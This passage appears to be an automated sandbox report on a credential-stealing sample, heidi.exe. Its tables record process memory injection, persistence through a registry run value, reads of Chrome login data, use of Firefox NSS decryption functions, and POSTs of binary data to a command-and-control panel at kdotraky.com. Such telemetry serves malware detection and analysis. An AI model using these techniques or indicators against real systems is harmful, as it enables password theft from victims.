| ntdll.dll | 0x77b60000 | 0x77cdffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #3: c:\users\kft6utqw\appdata\local\temp\heidi.exe | 0xa40 | address = 0x400000, size = 663552 |
|
1 | |
| Modify Memory | #3: c:\users\kft6utqw\appdata\local\temp\heidi.exe | 0xa40 | address = 0x1a0000, size = 4096 |
|
1 | |
| Modify Control Flow | #3: c:\users\kft6utqw\appdata\local\temp\heidi.exe | 0xa40 | os_tid = 0xa74, address = 0x1c70000 |
|
1 |
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\kft6utqw\appdata\roaming\98e541\12eef2.exe | 717.50 KB (734720 bytes) |
MD5:
a6a97f17880e37067c822e14a75bb3af
SHA1: 1aab183abb65685af92b201a2e47ba3d9ce0856e SHA256: b1eeec190113584579fe9376b88933d5e1871b3e8fdc86d8a490db4d044196ac |
|
|
| c:\users\kft6utqw\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1534390919-4215197118-2202912847-1000\31665589e43aaafc284e70c59b175d25_7c68ff26-a003-470d-b2af-255a5acd32f2 | 0.05 KB (49 bytes) |
MD5:
884bb48a55da67b4812805cb8905277d
SHA1: 6b3d33e00f5b9deae2826f80644cb4f6e78b7401 SHA256: 78877fa898f0b4c45c9c33ae941e40617ad7c8657a307db62bc5691f92f4f60e |
|
|
| c:\users\kft6utqw\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1534390919-4215197118-2202912847-1000\31665589e43aaafc284e70c59b175d25_7c68ff26-a003-470d-b2af-255a5acd32f2 | 0.05 KB (49 bytes) |
MD5:
5c2c94ca91d5485579b54b3a7b19b805
SHA1: 2c83b907fabea29308a58c94b3a9a128acd48ceb SHA256: 3cdf206ecf28d38a849329a7ff4e3acf3edc35a83f7692ef0074984dcbedb326 |
|
|
| c:\users\kft6utqw\appdata\roaming\98e541\12eef2.hdb | 0.00 KB (4 bytes) |
MD5:
aced026ed487b5cbb298f9ab09e6f1c1
SHA1: 1ceff0fbc90b0f2c6fab37bcde68f2a9170a7cf8 SHA256: c22bcce160e0645d030b554a30a0671bc2b2f30b1654dcd4111d871bb9c8e6bf |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\AppData\Roaming\98E541\12EEF2.hdb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data | type = size, size_out = 0 |
|
1 | |
| Move | C:\Users\kFT6uTQW\AppData\Roaming\98E541\12EEF2.exe | source_filename = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Read | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data | size = 18432, size_out = 18432 |
|
1 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\98E541\12EEF2.hdb | size = 4 |
|
1 | |
| Delete | C:\Users\kFT6uTQW\AppData\Roaming\98E541\12EEF2.hdb | - |
|
1 | |
| Delete | C:\Users\kFT6uTQW\AppData\Roaming\98E541\12EEF2.lck | - |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography | value_name = MachineGuid, data = 55 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox | value_name = CurrentVersion |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\25.0 (en-US)\Main | value_name = Install Directory |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup | value_name = SetupPath |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari | value_name = InstallDir |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon | value_name = CurrentVersion |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey | value_name = CurrentVersion |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey | value_name = CurrentVersion |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock | value_name = CurrentVersion |
|
1 | |
| Write Value | HKEY_CURRENT_USER\������Д�������ќ��Ћ���Я����Й���Й��я�� | value_name = 98E541, data = C:\Users\kFT6uTQW\AppData\Roaming\98E541\12EEF2.exe |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
14 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | SHELL32 | base_address = 0x76100000 |
|
4 | |
| Load | shlwapi | base_address = 0x76f10000 |
|
86 | |
| Load | OLEAUT32.dll | base_address = 0x757f0000 |
|
1 | |
| Load | ws2_32.dll | base_address = 0x77720000 |
|
1 | |
| Load | ole32.dll | base_address = 0x75e10000 |
|
1 | |
| Load | ADVAPI32 | base_address = 0x77330000 |
|
76 | |
| Load | user32 | base_address = 0x75930000 |
|
51 | |
| Load | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | base_address = 0x75390000 |
|
2 | |
| Load | NETAPI32 | base_address = 0x75510000 |
|
3 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = NSS_Init, address_out = 0x7544d70b |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = NSS_Shutdown, address_out = 0x7544d13c |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11_GetInternalKeySlot, address_out = 0x753e3c51 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11_FreeSlot, address_out = 0x753e3333 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11_Authenticate, address_out = 0x753cd3ca |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11SDR_Decrypt, address_out = 0x753e00a7 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11_CheckUserPassword, address_out = 0x753ccbc4 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = SECITEM_FreeItem, address_out = 0x7544e656 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_finalize, address_out = 0x754c9f60 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_step, address_out = 0x754e5200 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_close, address_out = 0x754cbde0 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_column_text, address_out = 0x7549d400 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_open16, address_out = 0x754f1cd0 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_prepare_v2, address_out = 0x7547cea0 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = NetUserGetInfo, address_out = 0x754c1be2 |
|
3 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = XABNCPUWKW |
|
3 | |
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
1 | |
| Get Info | type = Hardware Information |
|
3 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = 73EE9CC98E5412EEF2B9A336 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Set Environment String | name = PATH, value = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Mozilla Firefox |
|
1 | |
| Set Environment String | name = PATH, value = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile0, key_name = Path, data_out = Profiles/p7ap74gw.default |
|
1 | |
| Read | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile1, key_name = Path |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = kdotraky.com, address_out = 101.99.75.184, service = 80 |
|
4 | |
| Resolve Name | host = ÅÐÐÑÐЯÐÐÑ, service = 80 |
|
2 |
| Information | Value |
|---|---|
| Total Data Sent | 1.74 KB (1786 bytes) |
| Total Data Received | 0.66 KB (672 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | 101.99.75.184:80 |
| Information | Value |
|---|---|
| Handle | 0x18c |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 101.99.75.184 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49159 |
| Data Sent | 0.50 KB (514 bytes) |
| Data Received | 0.17 KB (179 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 101.99.75.184, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 248, size_out = 248 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 266, size_out = 266 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4048, size_out = 179 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
| Information | Value |
|---|---|
| Handle | 0x190 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 101.99.75.184 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49160 |
| Data Sent | 0.43 KB (442 bytes) |
| Data Received | 0.17 KB (179 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 101.99.75.184, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 248, size_out = 248 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 194, size_out = 194 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4048, size_out = 179 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
| Information | Value |
|---|---|
| Handle | 0x190 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 101.99.75.184 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49160 |
| Data Sent | 0.41 KB (415 bytes) |
| Data Received | 0.15 KB (157 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 101.99.75.184, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 248, size_out = 248 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 167, size_out = 167 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4048, size_out = 157 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
| Information | Value |
|---|---|
| Handle | 0x18c |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 101.99.75.184 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49159 |
| Data Sent | 0.41 KB (415 bytes) |
| Data Received | 0.15 KB (157 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 101.99.75.184, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 248, size_out = 248 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 167, size_out = 167 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4048, size_out = 157 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.97 KB (992 bytes) |
| Total Data Received | 0.00 KB (0 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | kdotraky.com |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.08 (Charon; Inferno) |
| Server Name | kdotraky.com |
| Server Port | 80 |
| Data Sent | 0.24 KB (248 bytes) |
| Data Received | 0.00 KB (0 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = kdotraky.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /temp/Panel/five/fre.php |
|
1 | |
| Send HTTP Request | headers = content-length: 266, content-key: 1B8D0678, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: kdotraky.com, content-type: application/octet-stream, url = kdotraky.com/temp/Panel/five/fre.php |
|
1 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.08 (Charon; Inferno) |
| Server Name | kdotraky.com |
| Server Port | 80 |
| Data Sent | 0.24 KB (248 bytes) |
| Data Received | 0.00 KB (0 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = kdotraky.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /temp/Panel/five/fre.php |
|
1 | |
| Send HTTP Request | headers = content-length: 194, content-key: 1B8D0678, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: kdotraky.com, content-type: application/octet-stream, url = kdotraky.com/temp/Panel/five/fre.php |
|
1 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.08 (Charon; Inferno) |
| Server Name | kdotraky.com |
| Server Port | 80 |
| Data Sent | 0.24 KB (248 bytes) |
| Data Received | 0.00 KB (0 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = kdotraky.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /temp/Panel/five/fre.php |
|
1 | |
| Send HTTP Request | headers = content-length: 167, content-key: 1B8D0678, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: kdotraky.com, content-type: application/octet-stream, url = kdotraky.com/temp/Panel/five/fre.php |
|
1 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.08 (Charon; Inferno) |
| Server Name | kdotraky.com |
| Server Port | 80 |
| Data Sent | 0.24 KB (248 bytes) |
| Data Received | 0.00 KB (0 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = kdotraky.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /temp/Panel/five/fre.php |
|
1 | |
| Send HTTP Request | headers = content-length: 167, content-key: 1B8D0678, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: kdotraky.com, content-type: application/octet-stream, url = kdotraky.com/temp/Panel/five/fre.php |
|
1 |
